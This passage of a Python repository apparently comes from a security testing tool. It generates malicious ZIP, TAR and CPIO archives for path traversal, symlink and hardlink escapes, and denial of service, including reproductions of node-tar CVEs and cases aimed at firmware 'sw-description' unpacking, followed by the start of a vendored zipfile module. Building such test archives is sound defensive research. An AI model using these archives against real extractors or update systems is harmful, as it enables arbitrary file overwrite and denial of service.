and name != "..": 633 | repeat = 99 # we do not need to replace or repeat, this is safe *ON UNIX LIKE SYSTEMS* 634 | success = True 635 | # print(f"Success: {name_to_use} is safe for CPIO {self.format} file {self.output_path}") 636 | else: 637 | repeat += 1 638 | name_to_use = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.ascii_letters, k=len(name))) 639 | shutil.copyfile(self.output_path, "/tmp/cpio-file-tmp.cpio") 640 | if type == 0: 641 | try: 642 | with open(name_to_use, "w") as f: 643 | f.write(content) 644 | except OSError as e: 645 | raise UnsupportedException(e) 646 | elif type == 1: 647 | try: 648 | os.mkdir(name_to_use) 649 | except OSError as e: 650 | raise UnsupportedException(e) 651 | elif type == 2: 652 | if "\x00" in to_name: 653 | raise UnsupportedException("Embedded null bytes not supported in CPIO symlink target") 654 | try: 655 | os.symlink(to_name, name_to_use) 656 | except OSError as e: 657 | raise UnsupportedException(e) 658 | self._add_list_of_existing_components((name_to_use,)) 659 | if type == 0: 660 | os.remove(name_to_use) 661 | elif type == 1: 662 | os.removedirs(name_to_use) 663 | elif type == 2: 664 | os.remove(name_to_use) 665 | if name != name_to_use: 666 | with open(self.get_output_path(), "rb") as f: 667 | cpio_content = f.read() 668 | with open(self.get_output_path(), "wb") as f: 669 | count = cpio_content.count(name_to_use.encode()) 670 | if count == 0: 671 | #print(f"ERROR: Couldn't find the file {name_to_use} we just put into the CPIO {self.format} file {self.output_path}") 672 | shutil.copyfile("/tmp/cpio-file-tmp.cpio", self.output_path) 673 | errors += "{name_to_use} not in file. 
" 674 | elif count == 1: 675 | cpio_content = cpio_content.replace(name_to_use.encode(), name.encode()) 676 | f.write(cpio_content) 677 | repeat = 99 # we do not need to replace or repeat, as it worked as expected 678 | #print(f"Success: {name_to_use} we just put into the CPIO {self.format} file {self.output_path} was renamed to {name}") 679 | success = True 680 | else: 681 | #print(f"ERROR: There is more than once the string {name_to_use} in the CPIO {self.format} file {self.output_path}") 682 | shutil.copyfile("/tmp/cpio-file-tmp.cpio", self.output_path) 683 | errors += "More than one {name_to_use} in file. " 684 | if not success: 685 | raise UnsupportedException(f"Tried 5 times to include name {name_to_use} as a replacement for {name} in the CPIO {self.format} file {self.output_path} but that didn't work. Errors were: {errors}") 686 | 687 | 688 | def _add_list_of_existing_components(self, file_list): 689 | stdin_input = "\n".join(file_list).encode() 690 | cmd = self._get_command() 691 | p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.STDOUT) 692 | stdout = p.communicate(input=stdin_input)[0] 693 | #print(stdout.decode()) 694 | def get_output_filename_addition(self): 695 | addition = f"{self.attack_name}_{self.format}" 696 | return addition #+ "_" + str(random.randint(10000, 99999)) 697 | def get_output_path(self, no_extension=False): 698 | path = f"../{OUTPUT_DIR}/{CustomCpioArchive.FILETYPE}/{self.format}/{OUTPUT_FILE_PREFIX}" + self.get_output_filename_addition() 699 | if no_extension: 700 | return path 701 | else: 702 | return path + "." 
+ CustomCpioArchive.FILETYPE 703 | 704 | def add_cwd_content(self): 705 | file_list = [] 706 | add_cwd_to_archive(file_list.append) 707 | self._add_list_of_existing_components(file_list) 708 | self.info_out_file.write(f"- All files from {INPUT_FOLDER} were packed into this archive\n") 709 | 710 | def add_dummy_at_path(self, _, payload_path, is_file=True): 711 | #payload_path = payload_path if payload_path.endswith("/") else payload_path + "/" 712 | dir_or_file = "file" if is_file else "dir" 713 | if "\x00" in payload_path: 714 | raise UnsupportedException("Zero bytes in payloads are not supported by the CPIO toolchain") 715 | else: 716 | if USE_PAYLOAD_DEFAULT_NAME: 717 | self._add_nonexisting_circumvent_filtering(payload_path + PAYLOAD_DEFAULT_NAME, 0 if is_file else 1) 718 | self.info_out_file.write(f"- Added {dir_or_file} at {payload_path + PAYLOAD_DEFAULT_NAME}\n") 719 | else: 720 | filename_in_archive = payload_path + self.get_output_filename_addition() + "_" + CustomCpioArchive.FILETYPE 721 | self._add_nonexisting_circumvent_filtering(filename_in_archive, 0 if is_file else 1) 722 | self.info_out_file.write(f"- Added {dir_or_file} at {filename_in_archive}\n") 723 | 724 | def add_file(self, file_path, content): 725 | try: 726 | os.remove("../tmp_file2") 727 | except FileNotFoundError: 728 | pass 729 | with open("../tmp_file2", "w") as f: 730 | f.write(content) 731 | self._add_nonexisting_circumvent_filtering(file_path, 0, content=content) 732 | self.info_out_file.write(f"- Added file at {file_path} with content {content[:10]}...\n") 733 | 734 | def add_dir(self, dir_path): 735 | self._add_nonexisting_circumvent_filtering(dir_path, 1) 736 | self.info_out_file.write(f"- Added dir at {dir_path}\n") 737 | 738 | def add_symlink(self, from_name, to_name): 739 | self._add_nonexisting_circumvent_filtering(from_name, 2, to_name=to_name) 740 | self.info_out_file.write(f"- Added symlink pointing from {from_name} to {to_name}\n") 741 | 742 | def add_hardlink(self, 
from_name, to_name): 743 | # TODO 744 | raise UnsupportedException("Hardlinks not supported for cpio files") 745 | 746 | def close(self): 747 | self.info_out_file.close() 748 | 749 | 750 | class ZipVariationCreator: 751 | def create(self, attack_name): 752 | for compression, compress_levels in ZIP_CONFIG: 753 | for compress_level in compress_levels: 754 | try: 755 | yield CustomZipArchive(attack_name, compression, compress_level) 756 | except FileAlreadyExistsException: 757 | Logger.info(f"File already exists, not creating ZIP {attack_name}, {compression}, {compress_level}") 758 | 759 | class TarVariationCreator: 760 | def create(self, attack_name): 761 | for compression_file_ext, compression in TAR_COMPRESSION_CONFIG: 762 | for format, encodings in TAR_CONFIG: 763 | for encoding in encodings: 764 | for error in TAR_ERRORS_CONFIG: 765 | try: 766 | yield CustomTarArchive(attack_name, compression_file_ext, compression, format, encoding, error) 767 | except FileAlreadyExistsException: 768 | Logger.info(f"File already exists, not creating TAR {attack_name}, {compression_file_ext}, {compression}, {format}, {encoding}, {error}") 769 | class CpioVariationCreator: 770 | def __init__(self, gnu_cpio_binary): 771 | self.gnu_cpio_binary = gnu_cpio_binary 772 | 773 | def create(self, attack_name): 774 | for format in CPIO_CONFIG: 775 | try: 776 | yield CustomCpioArchive(self.gnu_cpio_binary, attack_name, format) 777 | except FileAlreadyExistsException: 778 | Logger.info(f"File already exists, not creating CPIO {attack_name}, {format}") 779 | 780 | 781 | def main(): 782 | 783 | with open("tmp_file", "w") as f: 784 | f.write(FILE_CONTENT) 785 | 786 | if not os.path.exists("tmp_dir"): 787 | os.mkdir("tmp_dir") 788 | 789 | if not os.path.exists(OUTPUT_DIR): 790 | os.mkdir(OUTPUT_DIR) 791 | if not os.path.exists(f"{OUTPUT_DIR}/zip"): 792 | os.mkdir(f"{OUTPUT_DIR}/zip") 793 | for name in CustomZipArchive.NAMES_COMPRESSION.values(): 794 | os.mkdir(f"{OUTPUT_DIR}/zip/{name}") 795 | if 
not os.path.exists(f"{OUTPUT_DIR}/tar"): 796 | os.mkdir(f"{OUTPUT_DIR}/tar") 797 | os.mkdir(f"{OUTPUT_DIR}/tar/ustar") 798 | os.mkdir(f"{OUTPUT_DIR}/tar/gnu") 799 | os.mkdir(f"{OUTPUT_DIR}/tar/pax") 800 | if not os.path.exists(f"{OUTPUT_DIR}/tar.gz"): 801 | os.mkdir(f"{OUTPUT_DIR}/tar.gz") 802 | os.mkdir(f"{OUTPUT_DIR}/tar.gz/ustar") 803 | os.mkdir(f"{OUTPUT_DIR}/tar.gz/gnu") 804 | os.mkdir(f"{OUTPUT_DIR}/tar.gz/pax") 805 | if not os.path.exists(f"{OUTPUT_DIR}/tar.bz2"): 806 | os.mkdir(f"{OUTPUT_DIR}/tar.bz2") 807 | os.mkdir(f"{OUTPUT_DIR}/tar.bz2/ustar") 808 | os.mkdir(f"{OUTPUT_DIR}/tar.bz2/gnu") 809 | os.mkdir(f"{OUTPUT_DIR}/tar.bz2/pax") 810 | if not os.path.exists(f"{OUTPUT_DIR}/cpio"): 811 | os.mkdir(f"{OUTPUT_DIR}/cpio") 812 | for format in CPIO_CONFIG: 813 | os.mkdir(f"{OUTPUT_DIR}/cpio/{format}") 814 | 815 | os.chdir(INPUT_FOLDER) 816 | 817 | gnu_cpio_binary = "cpio" 818 | output = subprocess.check_output([gnu_cpio_binary, '--version']).decode() 819 | if "GNU cpio" in output: 820 | Logger.info("Good, your 'cpio' command is GNU cpio") 821 | else: 822 | # Use MacOS compiled binary 823 | gnu_cpio_binary = "../cpio-2.14-darwin" 824 | output = subprocess.check_output([gnu_cpio_binary, '--version']).decode() 825 | if not "GNU cpio" in output: 826 | Logger.info("Unfortunately we couldn't find a GNU cpio binary on your system. 
Please install GNU cpio.") 827 | return 828 | 829 | Logger.info(f"fyi, if you want to create .jar files, put a META-INF folder into {INPUT_FOLDER} and rename all .zip to .jar") 830 | Logger.info(f"The script will on-error print the exception (if a file can't be created) and then delete the corresponding archive file") 831 | Logger.info(f"Not printing any compatiblity issues with tar ustar format, as it is very limited in path length") 832 | Logger.info("Starting to generate files...") 833 | 834 | payloads_already = set() 835 | for name, payload, start, depths in PATH_TRAVERSAL_ATTACKS: 836 | for depth in depths: 837 | payload_path = start + payload * depth 838 | attack_name = f"{name}_{depth}" 839 | if payload_path in payloads_already: 840 | Logger.info(f"Warning, {payload_path} would be created twice, ignoring duplicate...") 841 | continue 842 | else: 843 | payloads_already.add(payload_path) 844 | ### 845 | # plain attacks in PATH_TRAVERSAL_ATTACKS 846 | ### 847 | for creator in ( 848 | ZipVariationCreator(), 849 | TarVariationCreator(), 850 | CpioVariationCreator(gnu_cpio_binary), 851 | ): 852 | for archive in creator.create(attack_name): 853 | try: 854 | archive.add_cwd_content() 855 | archive.add_dummy_file_at_path(payload_path) 856 | archive.close() 857 | except UnsupportedException as e: 858 | Logger.info(e) if not 'ustar' in str(e) else "" 859 | archive.close_and_remove() 860 | ### 861 | # tar.gz attack by attacking the included tar-name with PATH_TRAVERSAL_ATTACKS 862 | ### 863 | compression_file_ext = ".tar.gz" 864 | compression = "gz" 865 | attack_name = "tar_name_in_gz_" + attack_name 866 | for format, encodings in TAR_CONFIG: 867 | for encoding in encodings: 868 | for error in TAR_ERRORS_CONFIG: 869 | try: 870 | archive = CustomTarArchive(attack_name, compression_file_ext, compression, format, encoding, error, gz_tar_name=payload_path) 871 | except FileAlreadyExistsException: 872 | Logger.info(f"File already exists, not creating TAR {attack_name}, 
{compression_file_ext}, {compression}, {format}, {encoding}, {error}") 873 | continue 874 | archive.add_cwd_content() 875 | archive.close() 876 | 877 | ### 878 | # (hard/sym)link attacks for LINK_ATTACKS 879 | ### 880 | for link_type in ("hard", "soft"): 881 | for attack_name, to_name_file_path in LINK_ATTACKS: 882 | for creator in ( 883 | ZipVariationCreator(), 884 | TarVariationCreator(), 885 | CpioVariationCreator(gnu_cpio_binary), 886 | ): 887 | for archive in creator.create(link_type + attack_name): 888 | try: 889 | archive.add_cwd_content() 890 | if link_type == "hard": 891 | from_name = archive.add_dummy_hardlink_to_path(to_name_file_path) 892 | else: 893 | from_name = archive.add_dummy_symlink_to_path(to_name_file_path) 894 | # To make it more interesting, now that we have a link from_name -> to_name_file_path, 895 | # try to write to from_name/D 896 | archive.add_dummy_file_at_path(from_name + "/") 897 | archive.close() 898 | except UnsupportedException as e: 899 | Logger.info(e) if not 'ustar' in str(e) else "" 900 | archive.close_and_remove() 901 | 902 | ### 903 | # Hand crafted stuff 904 | ### 905 | 906 | for creator in ( 907 | ZipVariationCreator(), 908 | TarVariationCreator(), 909 | CpioVariationCreator(gnu_cpio_binary), 910 | ): 911 | attack_name = "dos_500_deep_dir" 912 | for archive in creator.create(attack_name): 913 | try: 914 | archive.add_cwd_content() 915 | archive.add_dummy_file_at_path("G/" * 500) 916 | archive.close() 917 | except UnsupportedException as e: 918 | Logger.info(e) if not 'ustar' in str(e) else "" 919 | archive.close_and_remove() 920 | 921 | attack_name = "dos_self_symlink" 922 | for archive in creator.create(attack_name): 923 | try: 924 | archive.add_cwd_content() 925 | archive.add_symlink("K", "K") 926 | archive.close() 927 | except UnsupportedException as e: 928 | Logger.info(e) if not 'ustar' in str(e) else "" 929 | archive.close_and_remove() 930 | 931 | attack_name = "dos_circle_symlink" 932 | for archive in 
creator.create(attack_name): 933 | try: 934 | archive.add_cwd_content() 935 | archive.add_symlink("L", "M") 936 | archive.add_symlink("M", "L") 937 | archive.close() 938 | except UnsupportedException as e: 939 | Logger.info(e) if not 'ustar' in str(e) else "" 940 | archive.close_and_remove() 941 | 942 | attack_name = "unpack_sw-description-symlink" 943 | for archive in creator.create(attack_name): 944 | try: 945 | archive.add_cwd_content() 946 | # If the attacked system only unpacks one file, but doesn't think that it could be a folder 947 | archive.add_dir("sw-description") 948 | archive.add_dummy_file_at_path("sw-description/") 949 | archive.add_symlink("sw-description/A", "A") 950 | archive.add_dummy_file_at_path("sw-description/A/") 951 | archive.close() 952 | except UnsupportedException as e: 953 | Logger.info(e) if not 'ustar' in str(e) else "" 954 | archive.close_and_remove() 955 | 956 | attack_name = "unpack_sw-description-path_traversal_1" 957 | for archive in creator.create(attack_name): 958 | try: 959 | archive.add_cwd_content() 960 | # If the attacked system only unpacks one file, but doesn't think that it could be a folder with path traversal inside 961 | archive.add_dir("sw-description") 962 | archive.add_dummy_file_at_path("sw-description/../../") 963 | archive.close() 964 | except UnsupportedException as e: 965 | Logger.info(e) if not 'ustar' in str(e) else "" 966 | archive.close_and_remove() 967 | 968 | attack_name = "unpack_sw-description-path_traversal_2" 969 | for archive in creator.create(attack_name): 970 | try: 971 | archive.add_cwd_content() 972 | # If the attacked system only unpacks one file, but doesn't think that it could be a path traversal folder 973 | archive.add_dummy_file_at_path("sw-description/../../") 974 | archive.close() 975 | except UnsupportedException as e: 976 | Logger.info(e) if not 'ustar' in str(e) else "" 977 | archive.close_and_remove() 978 | 979 | attack_name = "unpack_sw-description-path_traversal_3" 980 | for 
archive in creator.create(attack_name): 981 | try: 982 | archive.add_cwd_content() 983 | # If the attacked system only unpacks one file, but doesn't think that it could be located somewhere else 984 | archive.add_file("../../../../sw-description", FILE_CONTENT) 985 | archive.close() 986 | except UnsupportedException as e: 987 | Logger.info(e) if not 'ustar' in str(e) else "" 988 | archive.close_and_remove() 989 | 990 | attack_name = "unpack_sw-description-path_traversal_4" 991 | for archive in creator.create(attack_name): 992 | try: 993 | archive.add_cwd_content() 994 | # If the attacked system only unpacks one file, but doesn't think that it could have multiple entries in the archive with that name 995 | archive.add_symlink("sw-description", "/") 996 | archive.add_dir("sw-description") 997 | archive.add_file("sw-description", FILE_CONTENT) 998 | archive.close() 999 | except UnsupportedException as e: 1000 | Logger.info(e) if not 'ustar' in str(e) else "" 1001 | archive.close_and_remove() 1002 | 1003 | attack_name = "unpack_sw-description-hardlink" 1004 | for archive in creator.create(attack_name): 1005 | try: 1006 | archive.add_cwd_content() 1007 | # If the attacked system only unpacks one file, but doesn't think that it could be a folder 1008 | archive.add_dir("sw-description") 1009 | archive.add_dummy_file_at_path("sw-description/") 1010 | archive.add_hardlink("sw-description/A", "A") 1011 | archive.add_dummy_file_at_path("sw-description/A/") 1012 | archive.close() 1013 | except UnsupportedException as e: 1014 | Logger.info(e) if not 'ustar' in str(e) else "" 1015 | archive.close_and_remove() 1016 | 1017 | # Clashing unicode normalization names 1018 | # TODO: unclear if correctly understood https://github.com/isaacs/node-tar/security/advisories/GHSA-qq89-hq3f-393p 1019 | attack_name = "CVE-2021-37712" 1020 | for archive in creator.create(attack_name): 1021 | try: 1022 | archive.add_cwd_content() 1023 | # H h ʜ Η Н һ Ꮋ H h 1024 | # A specially crafted tar archive 
could thus include directories with two forms of the path that 1025 | # resolve to the same file system entity ... 1026 | archive.add_dir("h") 1027 | archive.add_dir("һ") 1028 | # ... followed by a symbolic link with a name in the first form ... 1029 | archive.add_symlink("h", "../") 1030 | # ... lastly followed by a file using the second form ... 1031 | archive.add_file("һ", FILE_CONTENT) 1032 | # ... It led to bypassing node-tar symlink checks on directories, essentially allowing an untrusted tar 1033 | # file to symlink into an arbitrary location and subsequently extracting arbitrary files into that 1034 | # location, thus allowing arbitrary file creation and overwrite. 1035 | archive.add_dummy_file_at_path("h/") 1036 | archive.add_dummy_file_at_path("һ/") 1037 | archive.close() 1038 | except UnsupportedException as e: 1039 | Logger.info(e) if not 'ustar' in str(e) else "" 1040 | archive.close_and_remove() 1041 | 1042 | # Clashing unicode normalization names 1043 | #TODO: unclear if correctly understood https://github.com/isaacs/node-tar/security/advisories/GHSA-9r2w-394v-53qc 1044 | attack_name = "CVE-2021-37701_1" 1045 | for archive in creator.create(attack_name): 1046 | try: 1047 | archive.add_cwd_content() 1048 | # This logic was insufficient when extracting tar files that contained both a directory and a symlink 1049 | # with the same name as the directory, where the symlink and directory names in the archive entry 1050 | # used backslashes as a path separator on posix systems 1051 | archive.add_dir("I") 1052 | archive.add_dir("I\\J") 1053 | archive.add_symlink("I\\J", "../") 1054 | archive.add_dummy_file_at_path("I\\J\\") 1055 | archive.close() 1056 | except UnsupportedException as e: 1057 | Logger.info(e) if not 'ustar' in str(e) else "" 1058 | archive.close_and_remove() 1059 | 1060 | # Clashing unicode normalization names 1061 | #TODO: unclear if correctly understood https://github.com/isaacs/node-tar/security/advisories/GHSA-9r2w-394v-53qc 1062 | 
attack_name = "CVE-2021-37701_2" 1063 | for archive in creator.create(attack_name): 1064 | try: 1065 | archive.add_cwd_content() 1066 | # Additionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at FOO, followed by a 1067 | # symbolic link named foo, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the 1068 | # filesystem, but not from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within 1069 | # the FOO directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. 1070 | archive.add_dir("K") 1071 | archive.add_symlink("k", "../") 1072 | archive.add_dummy_file_at_path("K/") 1073 | archive.add_dummy_file_at_path("k/") 1074 | archive.close() 1075 | except UnsupportedException as e: 1076 | Logger.info(e) if not 'ustar' in str(e) else "" 1077 | archive.close_and_remove() 1078 | 1079 | # Clashing unicode normalization names 1080 | #TODO: unclear if correctly understood https://github.com/isaacs/node-tar/security/advisories/GHSA-r628-mhmh-qjhw 1081 | attack_name = "CVE-2021-32803" 1082 | for archive in creator.create(attack_name): 1083 | try: 1084 | archive.add_cwd_content() 1085 | # This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory. 1086 | # This order of operations resulted in the directory being created and added to the node-tar directory cache. When a directory is 1087 | # present in the directory cache, subsequent calls to mkdir for that directory are skipped. However, this is also where node-tar 1088 | # checks for symlinks occur. 
1089 | archive.add_dir("L") 1090 | archive.add_symlink("L", "../") 1091 | archive.add_dummy_file_at_path("L/") 1092 | archive.close() 1093 | except UnsupportedException as e: 1094 | Logger.info(e) if not 'ustar' in str(e) else "" 1095 | archive.close_and_remove() 1096 | 1097 | # Maximum Windows path length according to 1098 | # https://learn.microsoft.com/en-us/windows/win32/fileio/maximum-file-path-limitation?tabs=registry 1099 | attack_name = "windows_maxlength_1" 1100 | for archive in creator.create(attack_name): 1101 | try: 1102 | archive.add_cwd_content() 1103 | archive.add_dir("C:\\" + "A" * 256) 1104 | # should cut away 1 character of PAYLOAD_DEFAULT_NAME 1105 | archive.add_file("C:\\" + "A" * (255 - len(PAYLOAD_DEFAULT_NAME) + 1) + f"/{PAYLOAD_DEFAULT_NAME}", 1106 | FILE_CONTENT) 1107 | archive.close() 1108 | except UnsupportedException as e: 1109 | Logger.info(e) if not 'ustar' in str(e) else "" 1110 | archive.close_and_remove() 1111 | 1112 | os.remove("../tmp_file") 1113 | try: 1114 | os.remove("../tmp_file2") 1115 | except FileNotFoundError: 1116 | pass 1117 | #Logger.info("Cleaning up duplicates in output folder") 1118 | DirectoryCleaner.delete_duplicates_recursively(f"../{OUTPUT_DIR}/", use_disc=False, dry_run=False) 1119 | 1120 | class Logger: 1121 | @staticmethod 1122 | def info(*text): 1123 | import datetime 1124 | print("[+ " + str(datetime.datetime.now()) + "] "+str(" ".join(str(i) for i in text))) 1125 | 1126 | class DirectoryCleaner: 1127 | #filesizes dict can get pretty huge, so I ran out of memory before 1128 | #so let's just put it on disc. Make sure you have enough space 1129 | #in the mounted location. 
I had to replace the tmpfs on small embedded devices: 1130 | #mkdir /mnt/external-usb/tmpfs-dir 1131 | #umount /tmp 1132 | #ln -s /mnt/external-usb/tmpfs-dir/ /tmp 1133 | #Or simply use a location where you have enough space 1134 | filesizes_file = '/tmp/filesizes' 1135 | 1136 | @staticmethod 1137 | def find_duplicate_contents(rootdir, use_disc=False): 1138 | import hashlib 1139 | """Find duplicate files in directory tree.""" 1140 | if use_disc: 1141 | #filesizes can get pretty huge, so I ran out of memory before 1142 | #so let's just put it on disc. Make sure you have enough space 1143 | #in the mounted location. I had to replace the tmpfs 1144 | #mkdir /mnt/external-usb/tmpfs-dir 1145 | #umount /tmp 1146 | #ln -s /mnt/external-usb/tmpfs-dir/ /tmp 1147 | #Or simply use a location where you have enough space! 1148 | import shelve 1149 | if os.path.isfile(DirectoryCleaner.filesizes_file): 1150 | os.remove(DirectoryCleaner.filesizes_file) 1151 | filesizes = shelve.open(DirectoryCleaner.filesizes_file) 1152 | else: 1153 | filesizes = {} 1154 | #Logger.info("Building up dict with key as filesize and value is list of filenames...") 1155 | for path, _, files in os.walk(rootdir): 1156 | for filename in files: 1157 | filepath = os.path.join(path, filename) 1158 | filesize = os.stat(filepath).st_size 1159 | #works with both, dict and shelve: 1160 | k = filesizes.setdefault(str(filesize), set()) 1161 | k.add(filepath) 1162 | # We are only interested in lists with more than one entry, 1163 | # meaning a file can not have the same content if it has a 1164 | # different size 1165 | #Logger.info("Checking lists with more than one file...") 1166 | lists_longer_than_one = [ flist for flist in filesizes.values() if len(flist)>1 ] 1167 | #Logger.info("Checking " + str(len(lists_longer_than_one)) + " lists with more than one file...") 1168 | i = 0 1169 | for files in lists_longer_than_one: 1170 | i += 1 1171 | if i % 10000 == 0: 1172 | Logger.info("Done " + str(i) + " lists...") 1173 
| if len(files) >= 10000: 1174 | Logger.info("Found a list with " + str(len(files)) + " entries, will need to read that many files and calculate their hashes...") 1175 | unique = set() 1176 | for filepath in files: 1177 | if os.path.isfile(filepath): 1178 | with open(filepath, "rb") as openfile: 1179 | # We are not interested in cryptographic strength, so let's use md5 here instead of sha256: 1180 | filehash = hashlib.md5(openfile.read()).digest() 1181 | if filehash not in unique: 1182 | unique.add(filehash) 1183 | else: 1184 | yield filepath 1185 | if use_disc and os.path.isfile(DirectoryCleaner.filesizes_file): 1186 | os.remove(DirectoryCleaner.filesizes_file) 1187 | 1188 | @staticmethod 1189 | def delete_duplicates_recursively(search_dir, use_disc=False, dry_run=True): 1190 | Logger.info("Removing duplicates in", search_dir) 1191 | i = 0 1192 | for duplicate in DirectoryCleaner.find_duplicate_contents(search_dir, use_disc=use_disc): 1193 | if dry_run: 1194 | Logger.info("[DRY-RUN] Deleting the duplicate file:", duplicate) 1195 | i += 1 1196 | else: 1197 | #Logger.info("Deleting the duplicate file:", duplicate) 1198 | i += 1 1199 | os.remove(duplicate) 1200 | # Also remove .txt file next to it 1201 | filepath, filename = os.path.split(duplicate) 1202 | txt_file = filepath + "/" + filename.split(".")[0] + ".txt" 1203 | if os.path.exists(txt_file): 1204 | os.remove(txt_file) 1205 | 1206 | Logger.info(f"Deleted {i} duplicates in", search_dir) 1207 | 1208 | if __name__ == "__main__": 1209 | main() 1210 | -------------------------------------------------------------------------------- /fipfile/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Read and write ZIP files. 3 | 4 | XXX references to utf-8 need further investigation. 
5 | """ 6 | import binascii 7 | import importlib.util 8 | import io 9 | import os 10 | import shutil 11 | import stat 12 | import struct 13 | import sys 14 | import threading 15 | import time 16 | 17 | try: 18 | import zlib # We may need its compression method 19 | crc32 = zlib.crc32 20 | except ImportError: 21 | zlib = None 22 | crc32 = binascii.crc32 23 | 24 | try: 25 | import bz2 # We may need its compression method 26 | except ImportError: 27 | bz2 = None 28 | 29 | try: 30 | import lzma # We may need its compression method 31 | except ImportError: 32 | lzma = None 33 | 34 | __all__ = ["BadZipFile", "BadZipfile", "error", 35 | "ZIP_STORED", "ZIP_DEFLATED", "ZIP_BZIP2", "ZIP_LZMA", 36 | "is_zipfile", "ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile", 37 | "Path"] 38 | 39 | class BadZipFile(Exception): 40 | pass 41 | 42 | 43 | class LargeZipFile(Exception): 44 | """ 45 | Raised when writing a zipfile, the zipfile requires ZIP64 extensions 46 | and those extensions are disabled. 47 | """ 48 | 49 | error = BadZipfile = BadZipFile # Pre-3.2 compatibility names 50 | 51 | 52 | ZIP64_LIMIT = (1 << 31) - 1 53 | ZIP_FILECOUNT_LIMIT = (1 << 16) - 1 54 | ZIP_MAX_COMMENT = (1 << 16) - 1 55 | 56 | # constants for Zip file compression methods 57 | ZIP_STORED = 0 58 | ZIP_DEFLATED = 8 59 | ZIP_BZIP2 = 12 60 | ZIP_LZMA = 14 61 | # Other ZIP compression methods not supported 62 | 63 | DEFAULT_VERSION = 20 64 | ZIP64_VERSION = 45 65 | BZIP2_VERSION = 46 66 | LZMA_VERSION = 63 67 | # we recognize (but not necessarily support) all features up to that version 68 | MAX_EXTRACT_VERSION = 63 69 | 70 | # Below are some formats and associated data for reading/writing headers using 71 | # the struct module. 
The names and structures of headers/records are those used 72 | # in the PKWARE description of the ZIP file format: 73 | # http://www.pkware.com/documents/casestudies/APPNOTE.TXT 74 | # (URL valid as of January 2008) 75 | 76 | # The "end of central directory" structure, magic number, size, and indices 77 | # (section V.I in the format document) 78 | structEndArchive = b"<4s4H2LH" 79 | stringEndArchive = b"PK\005\006" 80 | sizeEndCentDir = struct.calcsize(structEndArchive) 81 | 82 | _ECD_SIGNATURE = 0 83 | _ECD_DISK_NUMBER = 1 84 | _ECD_DISK_START = 2 85 | _ECD_ENTRIES_THIS_DISK = 3 86 | _ECD_ENTRIES_TOTAL = 4 87 | _ECD_SIZE = 5 88 | _ECD_OFFSET = 6 89 | _ECD_COMMENT_SIZE = 7 90 | # These last two indices are not part of the structure as defined in the 91 | # spec, but they are used internally by this module as a convenience 92 | _ECD_COMMENT = 8 93 | _ECD_LOCATION = 9 94 | 95 | # The "central directory" structure, magic number, size, and indices 96 | # of entries in the structure (section V.F in the format document) 97 | structCentralDir = "<4s4B4HL2L5H2L" 98 | stringCentralDir = b"PK\001\002" 99 | sizeCentralDir = struct.calcsize(structCentralDir) 100 | 101 | # indexes of entries in the central directory structure 102 | _CD_SIGNATURE = 0 103 | _CD_CREATE_VERSION = 1 104 | _CD_CREATE_SYSTEM = 2 105 | _CD_EXTRACT_VERSION = 3 106 | _CD_EXTRACT_SYSTEM = 4 107 | _CD_FLAG_BITS = 5 108 | _CD_COMPRESS_TYPE = 6 109 | _CD_TIME = 7 110 | _CD_DATE = 8 111 | _CD_CRC = 9 112 | _CD_COMPRESSED_SIZE = 10 113 | _CD_UNCOMPRESSED_SIZE = 11 114 | _CD_FILENAME_LENGTH = 12 115 | _CD_EXTRA_FIELD_LENGTH = 13 116 | _CD_COMMENT_LENGTH = 14 117 | _CD_DISK_NUMBER_START = 15 118 | _CD_INTERNAL_FILE_ATTRIBUTES = 16 119 | _CD_EXTERNAL_FILE_ATTRIBUTES = 17 120 | _CD_LOCAL_HEADER_OFFSET = 18 121 | 122 | # General purpose bit flags 123 | # Zip Appnote: 4.4.4 general purpose bit flag: (2 bytes) 124 | _MASK_ENCRYPTED = 1 << 0 125 | # Bits 1 and 2 have different meanings depending on the compression 
used. 126 | _MASK_COMPRESS_OPTION_1 = 1 << 1 127 | # _MASK_COMPRESS_OPTION_2 = 1 << 2 128 | # _MASK_USE_DATA_DESCRIPTOR: If set, crc-32, compressed size and uncompressed 129 | # size are zero in the local header and the real values are written in the data 130 | # descriptor immediately following the compressed data. 131 | _MASK_USE_DATA_DESCRIPTOR = 1 << 3 132 | # Bit 4: Reserved for use with compression method 8, for enhanced deflating. 133 | # _MASK_RESERVED_BIT_4 = 1 << 4 134 | _MASK_COMPRESSED_PATCH = 1 << 5 135 | _MASK_STRONG_ENCRYPTION = 1 << 6 136 | # _MASK_UNUSED_BIT_7 = 1 << 7 137 | # _MASK_UNUSED_BIT_8 = 1 << 8 138 | # _MASK_UNUSED_BIT_9 = 1 << 9 139 | # _MASK_UNUSED_BIT_10 = 1 << 10 140 | _MASK_UTF_FILENAME = 1 << 11 141 | # Bit 12: Reserved by PKWARE for enhanced compression. 142 | # _MASK_RESERVED_BIT_12 = 1 << 12 143 | # _MASK_ENCRYPTED_CENTRAL_DIR = 1 << 13 144 | # Bit 14, 15: Reserved by PKWARE 145 | # _MASK_RESERVED_BIT_14 = 1 << 14 146 | # _MASK_RESERVED_BIT_15 = 1 << 15 147 | 148 | # The "local file header" structure, magic number, size, and indices 149 | # (section V.A in the format document) 150 | structFileHeader = "<4s2B4HL2L2H" 151 | stringFileHeader = b"PK\003\004" 152 | sizeFileHeader = struct.calcsize(structFileHeader) 153 | 154 | _FH_SIGNATURE = 0 155 | _FH_EXTRACT_VERSION = 1 156 | _FH_EXTRACT_SYSTEM = 2 157 | _FH_GENERAL_PURPOSE_FLAG_BITS = 3 158 | _FH_COMPRESSION_METHOD = 4 159 | _FH_LAST_MOD_TIME = 5 160 | _FH_LAST_MOD_DATE = 6 161 | _FH_CRC = 7 162 | _FH_COMPRESSED_SIZE = 8 163 | _FH_UNCOMPRESSED_SIZE = 9 164 | _FH_FILENAME_LENGTH = 10 165 | _FH_EXTRA_FIELD_LENGTH = 11 166 | 167 | # The "Zip64 end of central directory locator" structure, magic number, and size 168 | structEndArchive64Locator = "<4sLQL" 169 | stringEndArchive64Locator = b"PK\x06\x07" 170 | sizeEndCentDir64Locator = 